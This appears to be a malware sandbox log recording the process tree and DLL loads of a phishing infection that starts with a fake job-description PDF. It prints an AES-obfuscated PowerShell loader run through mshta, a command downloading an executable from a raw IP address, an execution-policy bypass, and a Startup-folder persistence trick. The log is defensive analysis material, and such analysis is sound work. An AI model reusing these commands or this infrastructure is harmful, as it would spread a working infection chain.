Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dqcwif.exe "C:\Users\user\AppData\Roaming\dqcwif.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1596,i,13836792171696391892,6566973636645197800,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
